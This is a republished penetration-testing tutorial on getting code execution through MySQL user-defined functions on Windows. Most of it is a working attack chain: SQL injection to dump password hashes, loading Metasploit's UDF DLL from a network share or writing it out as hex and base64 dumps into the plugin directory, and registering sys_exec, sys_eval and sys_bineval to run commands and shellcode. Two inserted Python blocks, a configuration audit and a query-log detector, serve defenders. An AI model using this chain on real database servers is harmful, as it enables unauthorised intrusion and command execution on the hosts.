
How to use MySQL UDF for Penetration Test

2025-01-19 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)06/03 Report--

This article focuses on how to use MySQL UDF for penetration testing; interested readers may wish to take a look. The method introduced here is simple, fast and practical. Let the editor take you through how to use MySQL UDF for penetration testing.

Recently, while testing a financial institution, I found that they had their own intranet and used 64-bit MySQL 5.7 at the back end. In my experience most of my peers run into MSSQL, so this was a rare scenario for me. I found a SQL injection vulnerability in the web application that let me dump user names and password hashes from mysql.user, and I also found that my current privileges allowed me to write files to disk. That is what prompted me to write this article: I would like to share some tips on injecting a UDF library into MySQL and getting code execution and a shell under Windows. When I searched for related techniques on Google, I also found very few resources online, so I hope this write-up gives you a deeper understanding of this technique.

To recreate the scenario, I set up the latest MySQL 5.7.21 as my test environment and started mysqld with the '--secure-file-priv=' parameter set to an empty value. This let me use union-based injection in the intranet to retrieve the user names and password hashes from the mysql.user table. It is important to note that in MySQL 5.7 and later, the password column is no longer 'password' but 'authentication_string'.

# MySQL 5.6 and below
select host, user, password from mysql.user;

# MySQL 5.7 and above
select host, user, authentication_string from mysql.user;

Note that if you already have credentials, you can use Metasploit's mysql_hashdump.rb auxiliary module to dump the MySQL hashes. At the time of writing, the script needs an update to be compatible with MySQL 5.7; you can check my pull request here.

The host column for the user 'osanda' allows connections from 192.168.0.*, which means we can use that user to connect remotely from that IP range. I cracked the password hash and obtained the plaintext password.

After logging in to MySQL, I checked the permissions of the current user.

select * from mysql.user where user = substring_index(user(), '@', 1);

You can see that the user has very high privileges and can read and write files, so we can consider writing UDF DLL libraries to gain the ability to execute code.

What is the UDF library?

UDF stands for user-defined function in MySQL. It lets you write your own functions in a DLL and call them from MySQL. We will use the "lib_mysqludf_sys_64.dll" library, which ships with the Metasploit framework. Pick the UDF library matching the system architecture; they are located in the Metasploit installation directory "/usr/share/metasploit-framework/data/exploits/mysql/". Click here to view the download.

First of all, we query '@@version_compile_os' and '@@version_compile_machine' to get the operating system and the architecture of the current database build, respectively. The result shows that the system is 64-bit Windows and MySQL is also 64-bit.

MySQL [(none)]> select @@version_compile_os, @@version_compile_machine;
+----------------------+---------------------------+
| @@version_compile_os | @@version_compile_machine |
+----------------------+---------------------------+
| Win64                | x86_64                    |
+----------------------+---------------------------+

MySQL [(none)]> show variables like '%compile%';
+-------------------------+--------+
| Variable_name           | Value  |
+-------------------------+--------+
| version_compile_machine | x86_64 |
| version_compile_os      | Win64  |
+-------------------------+--------+

Starting with MySQL 5.0.67, the UDF library must be placed in the plugin folder, which we can find through the '@@plugin_dir' global variable. This variable can be viewed and edited in the my.ini file.

MySQL [(none)]> select @@plugin_dir;
+--------------------------------------------------------------+
| @@plugin_dir                                                 |
+--------------------------------------------------------------+
| D:\MySQL\mysql-5.7.21-winx64\mysql-5.7.21-winx64\lib\plugin\ |
+--------------------------------------------------------------+
1 row in set (0.02 sec)

MySQL [(none)]> show variables like 'plugin%';
+---------------+--------------------------------------------------------------+
| Variable_name | Value                                                        |
+---------------+--------------------------------------------------------------+
| plugin_dir    | D:\MySQL\mysql-5.7.21-winx64\mysql-5.7.21-winx64\lib\plugin\ |
+---------------+--------------------------------------------------------------+

You can change the plugin directory location through a mysqld command-line option.

mysqld.exe --plugin-dir=C:\\temp\\plugins\\

Another way is to write a new MySQL configuration file and pass it to mysqld with the --defaults-file argument.

mysqld.exe --defaults-file=C:\\temp\\my.ini

The contents of 'my.ini' are as follows:

[mysqld]
plugin_dir = C:\\temp\\plugins\\

In versions before MySQL 5.0.67, the file must be located in a directory searched by the system's dynamic linker. The same applies to versions before 4.1.25, as the following documentation excerpts explain.

Starting with MySQL 5.0.67, the file must be located in the plugin directory. The directory is given by the value of the plugin_dir system variable. If the value of plugin_dir is empty, the behaviour used before 5.0.67 applies: the file must be located in a directory searched by the system's dynamic linker.

Starting with MySQL 4.1.25, the file must be located in the plugin directory. The directory is given by the value of the plugin_dir system variable. If the value of plugin_dir is empty, the behaviour used before 4.1.25 applies: the file must be located in a directory searched by the system's dynamic linker.

In those older versions, you could upload the DLL to one of the following locations and then create a new UDF function:

@@datadir

@@basedir\bin

C:\windows

C:\windows\system

C:\windows\system32
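The conditions the walkthrough relies on up to this point are an empty secure_file_priv and a plugin_dir that INTO DUMPFILE can reach. The following defender-side audit is an added example, not code from the original article: it encodes the three secure_file_priv states (NULL, empty, directory) and checks whether a given plugin_dir is writable through SQL; the LAB_VARS values are a constructed sample mirroring the article's lab server, and the file name udf.dll is only illustrative.

```python
import ntpath

def _norm_dir(path):
    """Lower-case, backslash-separated Windows directory with one trailing separator."""
    p = ntpath.normpath(path.replace("/", "\\")).lower().rstrip("\\")
    return p + "\\"

def dumpfile_allowed(secure_file_priv, target_path):
    """Would INTO DUMPFILE / LOAD_FILE be permitted on target_path?
    secure_file_priv semantics: None disables file import/export entirely,
    "" (what the article starts mysqld with) imposes no restriction, and a
    directory allows only paths under it (prefix match on the directory)."""
    if secure_file_priv is None:
        return False
    if secure_file_priv == "":
        return True
    target_dir = ntpath.dirname(target_path)
    return _norm_dir(target_dir).startswith(_norm_dir(secure_file_priv))

def udf_staging_exposed(secure_file_priv, plugin_dir):
    """True when SQL alone could drop a library into plugin_dir, the precondition
    for CREATE FUNCTION ... SONAME to pick it up (file name is illustrative)."""
    return dumpfile_allowed(secure_file_priv, ntpath.join(plugin_dir, "udf.dll"))

def audit(show_variables):
    """Turn a name -> value mapping taken from SHOW VARIABLES into findings.
    The CLI prints a NULL secure_file_priv as the string NULL."""
    sfp = show_variables.get("secure_file_priv", "")
    sfp = None if sfp.upper() == "NULL" else sfp
    plugin_dir = show_variables["plugin_dir"]
    findings = []
    if sfp == "":
        findings.append("secure_file_priv is empty: INTO DUMPFILE may write anywhere the service account can")
    if udf_staging_exposed(sfp, plugin_dir):
        findings.append("plugin_dir is reachable by INTO DUMPFILE: " + plugin_dir)
    return findings

# Constructed sample mirroring the article's lab server (not a real host).
LAB_VARS = {
    "secure_file_priv": "",
    "plugin_dir": "D:\\MySQL\\mysql-5.7.21-winx64\\mysql-5.7.21-winx64\\lib\\plugin\\",
}

if __name__ == "__main__":
    for finding in audit(LAB_VARS):
        print(finding)
```

Pointing secure_file_priv at a dedicated directory that is not plugin_dir (or leaving it NULL) makes both findings disappear while keeping legitimate file import and export working.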

Upload binaries

There are many ways to do this. The load_file function supports network paths: if you can copy the DLL to a network share, you can load it directly and write it to disk.

select load_file('\\192.168.0.19\\network\\lib_mysqludf_sys_64.dll') into dumpfile "D:\\MySQL\\mysql-5.7.21-winx64\\mysql-5.7.21-winx64\\lib\\plugin\\udf.dll";

Another way is to hex-encode the entire DLL and write it to disk from the encoded value.

select hex(load_file('/usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_64.dll')) into dumpfile '/tmp/udf.hex';

select 0x4d5a90000300000004000000ffff0000b80000000000000040000000000000000000000000000000000000000... into dumpfile "D:\\MySQL\\mysql-5.7.21-winx64\\mysql-5.7.21-winx64\\lib\\plugin\\udf.dll";

Another way is to create a table and insert the binary data as a hex-encoded stream. You can do it with a single insert statement, or split the data into several parts and append them with update statements.

create table temp(data longblob);

insert into temp(data) values (0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000f00000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000000000000000000);

update temp set data = concat(data,0x33c2ede077a383b377a383b377a383b369f110b375a383b369f100b37da383b369f107b375a383b35065f8b374a383b377a382b35ba383b369f10ab376a383b369f116b375a383b369f111b376a383b369f112b376a383b35269636877a383b300000000000000000000000000000000504500006486060070b1834b00000000);

select data from temp into dumpfile "D:\\MySQL\\mysql-5.7.21-winx64\\mysql-5.7.21-winx64\\lib\\plugin\\udf.dll";

Alternatively, you can load the file from a network share directly into the table created above, or load it locally with the "load data infile" statement. Convert the file to hex as shown above and decode it as it is written to disk.

load data infile '\\192.168.0.19\\network\\udf.hex' into table temp fields terminated by '@OsandaMalith' lines terminated by '@OsandaMalith' (data);

select unhex(data) from temp into dumpfile 'D:\\MySQL\\mysql-5.7.21-winx64\\mysql-5.7.21-winx64\\lib\\plugin\\udf.dll';

The good news is that, starting with MySQL 5.6.1 and MariaDB 10.0.5, the to_base64 and from_base64 functions are available. If you are good at bypassing WAFs for SQL injection, I believe you already use these functions (hint: routed query injection).

select to_base64(load_file('/usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_64.dll')) into dumpfile '/tmp/udf.b64';

You can edit the base64 file and dump it to the plugin directory like this.

select from_base64("...") into dumpfile "D:\\MySQL\\mysql-5.7.21-winx64\\mysql-5.7.21-winx64\\lib\\plugin\\udf.dll";

After that, you can pipe the entire file into the mysql client like this.

mysql -h 192.168.0.30 -u osanda -pabc123 < /tmp/udf.b64

You can also write the base64-encoded file from a network share, or load it locally with the "load data infile" statement, and then dump it with the following statement.

select from_base64(data) from temp into dumpfile 'D:\\MySQL\\mysql-5.7.21-winx64\\mysql-5.7.21-winx64\\lib\\plugin\\udf.dll';

DLL exploration

I went through a lot of material online, but most of it only covers the 'sys_exec' function of the DLL shipped with Metasploit. Can the other functions be used as well? Looking at the DLL's export directory, I found that the author has also written several other very useful functions, listed below.

sys_exec

This function passes the argument 'args->args[0]' to the C 'system' function. You can use it to execute system commands on the target machine.

Installation

create function sys_exec returns int soname 'udf.dll';

Verification

select * from mysql.func where name = 'sys_exec';
+----------+-----+---------+----------+
| name     | ret | dl      | type     |
+----------+-----+---------+----------+
| sys_exec |   2 | udf.dll | function |
+----------+-----+---------+----------+

Delete

drop function sys_exec;

sys_eval

This function executes a system command and returns its standard output to the caller.

Installation

create function sys_eval returns string soname 'udf.dll';

Verification

select * from mysql.func where name = 'sys_eval';

Delete

drop function sys_eval;

Example

select sys_eval('dir');

sys_get

This function calls 'getenv' to return the value of an environment variable.

Installation

create function sys_get returns string soname 'udf.dll';

Verification

select * from mysql.func where name = 'sys_get';

Delete

drop function sys_get;

Example

select sys_get('logonserver');

Executing shellcode: sys_bineval

I found a very useful function, 'sys_bineval', in this DLL. It allocates RWX memory with the 'VirtualAlloc' API, copies 'args->args[0]' into the newly allocated memory with 'strcpy', and then passes the buffer to the 'CreateThread' API to start a new thread.

Looking at the 'CreateThread' call, the buffer copied by 'strcpy' is passed as 'lpParameter', the pointer handed to the new thread. The routine at 'StartAddress' simply moves 'lpParameter' into rax and executes call ptr rax, which transfers RIP to our shellcode.

Installation

create function sys_bineval returns int soname 'udf.dll';

Verification

select * from mysql.func where name = 'sys_bineval';

Delete

drop function sys_bineval;

Example

However, I could not get this function to work on the 64-bit platform, although it executes normally on 32-bit. You can pass the raw binary file directly, or encode it as base64 or hex and decode it when calling the function.

select sys_bineval(from_base64(load_file('./calc.b64')));

From the disassembly, I noticed that these external UDF functions do no proper exception handling. As a result, the slightest mistake when calling them can crash the mysqld.exe server.
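Every step of the chain above (architecture and plugin_dir reconnaissance, INTO DUMPFILE into plugin_dir, CREATE FUNCTION ... SONAME, calls to the sys_* functions) is visible to the server itself when the general query log is enabled. The detector below is an added example for defenders, not code from the original article: it parses MySQL 5.7 general-log lines, tags each statement with the stage it belongs to, and reports connections that progressed through several stages. The log excerpt is constructed, and the assumption is that general_log is on and the file format is the default Time / Id / Command / Argument layout.

```python
import re
from collections import defaultdict

# Constructed MySQL 5.7 general-log excerpt (Time, Id, Command, Argument); not from a real host.
SAMPLE_LOG = (
    "2025-01-19T10:01:02.000001Z\t   12 Query\tselect id, name from products where id = 5\n"
    "2025-01-19T10:01:09.000002Z\t   12 Query\tselect @@version_compile_os, @@version_compile_machine\n"
    "2025-01-19T10:01:15.000003Z\t   12 Query\tselect @@plugin_dir\n"
    "2025-01-19T10:01:40.000004Z\t   12 Query\tselect from_base64(\"TVqQAAMAAAAEAAAA...\") into dumpfile "
    "\"D:\\\\MySQL\\\\lib\\\\plugin\\\\udf.dll\"\n"
    "2025-01-19T10:01:52.000005Z\t   12 Query\tcreate function sys_eval returns string soname 'udf.dll'\n"
    "2025-01-19T10:02:03.000006Z\t   12 Query\tselect sys_eval('dir')\n"
    "2025-01-19T10:02:30.000007Z\t   19 Query\tselect count(*) from orders\n"
)

LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<conn>\d+)\s+(?P<cmd>\w+)\s+(?P<arg>.*)$")

# Stages of the chain the article walks through, in the order they are needed.
STAGES = [
    ("recon",    re.compile(r"@@(plugin_dir|version_compile_os|version_compile_machine|datadir|basedir)\b", re.I)),
    ("fetch",    re.compile(r"load_file\s*\(\s*['\"]\\\\", re.I)),   # load_file on a UNC path
    ("write",    re.compile(r"\binto\s+dumpfile\b", re.I)),
    ("register", re.compile(r"\bcreate\s+function\s+\w+\s+returns\s+\w+\s+soname\b", re.I)),
    ("execute",  re.compile(r"\bsys_(exec|eval|bineval|get)\s*\(", re.I)),
]

def parse_general_log(text):
    """Yield (connection id, statement) for every Query line in general-log text."""
    for raw in text.splitlines():
        m = LINE.match(raw)
        if m and m.group("cmd") == "Query":
            yield int(m.group("conn")), m.group("arg")

def classify(statement):
    """Stages a single statement matches, in STAGES order (possibly none)."""
    return [name for name, rx in STAGES if rx.search(statement)]

def udf_staging_sessions(text, min_stages=2):
    """Group hits per connection and keep sessions that reached at least min_stages
    distinct stages. A lone @@plugin_dir read or INTO DUMPFILE is weak evidence; the
    combination on one connection is what the article's walkthrough looks like."""
    seen = defaultdict(list)
    for conn, stmt in parse_general_log(text):
        for stage in classify(stmt):
            if stage not in seen[conn]:
                seen[conn].append(stage)
    return {c: s for c, s in seen.items() if len(s) >= min_stages}

if __name__ == "__main__":
    for conn, stages in udf_staging_sessions(SAMPLE_LOG).items():
        print(f"connection {conn}: UDF staging chain {' -> '.join(stages)}")
```

Statements injected through the web application arrive on the application's pooled connection, so the connection id points at the app tier rather than the attacker; the mysql.func table and the plugin directory listing then confirm whether a library was actually registered.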

At this point, I believe you have a deeper understanding of how to use MySQL UDF for penetration testing. You might as well try it out in practice. More related content is available through the relevant channels; follow us and keep learning!


© 2024 shulou.com SLNews company. All rights reserved.
